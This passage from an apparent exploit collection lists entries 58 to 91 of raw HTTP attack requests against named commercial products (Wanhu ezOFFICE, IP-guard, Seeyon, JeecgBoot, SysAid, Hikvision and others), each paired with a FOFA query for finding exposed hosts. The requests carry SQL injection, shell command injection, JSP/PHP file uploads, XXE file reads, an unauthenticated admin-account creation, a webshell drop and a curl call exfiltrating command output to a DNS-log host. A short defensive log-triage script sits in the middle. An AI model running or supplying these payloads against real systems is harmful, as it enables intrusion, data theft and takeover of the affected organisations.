User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD


60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64 for select 1,user(),3; the exportexcelbysql handler executes the decoded statement as-is.


61. Zheda Ente (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

The raw request body becomes the content of the file named in the filename parameter, so any extension, including .jsp, is accepted.


62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter reaches a shell; the ||echo ... > file part writes a marker file next to view.php. Verify by fetching it:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x


63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

The path parameter is not confined to the download directory; ../config.ini pulls the application's own configuration file.
64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

Time-based check: the SOAP call on a vulnerable host takes about five seconds longer than a call with a harmless sId.


65. Youkate (优卡特) LianAiYun (脸爱云) face-recognition smart management platform 1.0.55.0.0.1 permission bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the operator account test123456 with password 123456 was created without authentication.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators


66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The vulnerability is confirmed when the response (lines 42 and 43 in the source's test) contains the string 6cfe798ba8e5b85feb50164c59f4bec9, the hex digest produced by the injected HashBytes('MD5','102103122') call.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to (relative to the servlet's document store, so ../ escapes it), and fileType sets the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js suffix is a servlet path parameter: an extension-based authentication filter sees a static .js resource, while the container still dispatches the request to wf_printnum.jsp. Time-based check, as in entry 64.


69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Same ;.js filter bypass and time-based check as entry 68, this time through the gd_startUserCode parameter.


70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

The SID header is base64 for type C:\Windows\win.ini, the command the ViewState payload executes; replace it with your own marker command when testing.


71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

Time-based check on the pre-authentication login handler; a five-second delay in the response confirms the injection.

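Entries 57 to 71 share a small set of request shapes: a known vulnerable path, an injected WAITFOR DELAY or error-based probe, a ../ or ..;/ traversal, a ;.js path-parameter suffix, or shell metacharacters in a query parameter. The following is an added example for this write-up, not code from the original post or any vendor: a triage pass over combined-format access logs that URL-decodes each request target (repeatedly, to catch double encoding), strips servlet path parameters so filter-bypass spellings still match the endpoint list, and reports both the known endpoints from entries 57 to 71 and the generic markers. The log lines are constructed (addresses, timestamps and byte counts are made up) and the rule set is this example's own choice, deliberately broad so that endpoints not yet on the list (the ..;/ line below) are still caught by the generic rules.

```python
"""Triage web access logs for the request patterns catalogued in this list.

Added example for this write-up (not code from the original post or any vendor).
Endpoint paths come from entries 57-71 above; the log lines are constructed and the
decoding/matching rules are this example's own choices.
"""
import re
from urllib.parse import unquote_plus, urlsplit

# Combined log format: ip - - [time] "METHOD target HTTP/x" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Paths named in entries 57-71 (case-insensitive substring match on the decoded path).
KNOWN_ENDPOINTS = (
    "/tplus/UFAQD/keyEdit.aspx",
    "/tplus/UFAQD/KeyInfoList.aspx",
    "/importexport.php",
    "/entsoft_en/entereditor/jsp/fileupload.jsp",
    "/ipg/static/appr/lib/flexpaper/php/view.php",
    "/ipg/appr/MApplyList/downloadFile_client/getdatarecord",
    "/EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx",
    "/SystemMng.ashx",
    "/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp",
    "/defaultroot/wpsservlet",
    "/defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp",
    "/defaultroot/modules/subsidiary/contract/contract_gd.jsp",
    "/member/success.aspx",
    "/Global/Global_UserLogin.aspx",
)

# Generic markers, matched against the fully decoded request target.
MARKERS = {
    "sqli-time": re.compile(r"waitfor\s+delay", re.I),
    "sqli-probe": re.compile(r"@@version|hashbytes\s*\(|union\s+(?:all\s+)?select", re.I),
    "traversal": re.compile(r"\.\.;?/"),                       # ../ and Tomcat-style ..;/
    "path-param": re.compile(r";\.[a-z]+(?:\?|$)|\.\.;/", re.I),  # ;.js suffix, ..;/ segment
    "cmd-inject": re.compile(r"[|`\n]"),                         # pipe, backtick, embedded newline
}


def decode_target(target):
    """URL-decode up to three times; stops early once the text no longer changes."""
    out = target
    for _ in range(3):
        nxt = unquote_plus(out)
        if nxt == out:
            break
        out = nxt
    return out


def normalize_path(path):
    """Drop servlet path parameters (';.js', '..;/') so bypass spellings match the list."""
    return re.sub(r";[^/]*", "", path)


def triage_line(line):
    """Return [(rule, detail)] for one log line; [] when nothing matched or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = m.group("target")
    path = normalize_path(decode_target(urlsplit(target).path))
    decoded = decode_target(target)
    hits = []
    for ep in KNOWN_ENDPOINTS:
        if ep.lower() in path.lower():
            hits.append(("known-endpoint", ep))
            break
    for rule, rx in MARKERS.items():
        if rx.search(decoded):
            hits.append((rule, target[:80]))
    return hits


def triage_log(lines):
    """Map 1-based line number -> hits, for every line that produced at least one hit."""
    report = {}
    for n, line in enumerate(lines, 1):
        hits = triage_line(line)
        if hits:
            report[n] = hits
    return report


# Constructed sample log; addresses, times and byte counts are made up.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2024:03:14:07 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 500 1843',
    '203.0.113.5 - - [10/Mar/2024:03:14:09 +0800] "GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- HTTP/1.1" 200 512',
    '203.0.113.9 - - [10/Mar/2024:03:15:41 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1 HTTP/1.1" 200 88',
    '198.51.100.2 - - [10/Mar/2024:03:16:00 +0800] "GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&page=||id HTTP/1.1" 200 0',
    '198.51.100.7 - - [10/Mar/2024:03:17:22 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../etc/passwd HTTP/1.1" 200 1320',
    '192.0.2.10 - - [10/Mar/2024:03:18:05 +0800] "GET /index.html HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for n, hits in triage_log(SAMPLE_LOG).items():
        print(n, hits)
```

Run it over a real log with triage_log(open(path).readlines()); the fifth sample line shows why the generic rules matter: its endpoint is not on the list, yet the traversal and path-parameter rules still flag it.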
72. Seeyon OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

The xmlValue parameter carries a DTD whose external entity points at file:///c:/windows/win.ini; the parser resolves it and the file content is reflected in the VALUE field of the response.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD


74. Seeyon M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The time parameter is interpolated into a shell command, so the backtick substitution runs ifconfig and writes its output into cgi-bin. Verify:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x


76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

The UnitCode value is evaluated as a FreeMarker template; freemarker.template.utility.Execute runs the command and writes a marker file under webapps/ROOT. Verify:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x



77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--


78. PKPM (pkpmbs) construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field chooses the destination directory. Verify:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x


79. BYTEVALUE (百为) traffic control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

The path parameter is passed to a shell; the pipe runs id and its output is returned in the response.

80. Suda (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter is the output file name with no traversal check, so ../ places the JSP in the web root. Verify:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip


81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

The request is sent with an empty user name and a login handle of -1, i.e. without authenticating.

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

The z2 value is interpolated into a shell command; the quoted pipe runs id.

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

The sql field is rendered as a FreeMarker template before it is used, the same Execute?new() primitive as entry 76; here the result is exfiltrated through a DNS-log lookup instead of a marker file.


85. SysAid On-Premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request below drops a Godzilla webshell. The accountId parameter is a path traversal that makes the uploaded archive unpack under tomcat/webapps:
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Shell URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

The host value is placed in a ping command line; the %0a newlines break out of it and ${IFS} stands in for the space that the handler strips.


87. DBAPPSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

The suffix parameter is appended to the stored file name without traversal checks, so the upload lands in the web root and is reachable at /jfhatuwe.php.

88. DBAPPSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Decoded, the type parameter is a newline followed by echo '<?php echo "assdwdmpidmsbzoabahpjhnokiduw"; phpinfo(); ?>' >> /usr/local/webui/txzfsrur.php. Verify by requesting the written file, /txzfsrur.php (the source's verification line gives /astdfkhl.php, which does not match the file name written by the request above).

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

The %70 in the path is an encoded p: the request still reaches editflow_manager.jsp after decoding, but a filter matching the literal .jsp string does not see it. A response containing 24642 (111*222) confirms the injection.


90. Hikvision IP network intercom/broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

With type=99 the jsondata[ip] value is executed as a command instead of being pinged.


91. Hikvision integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
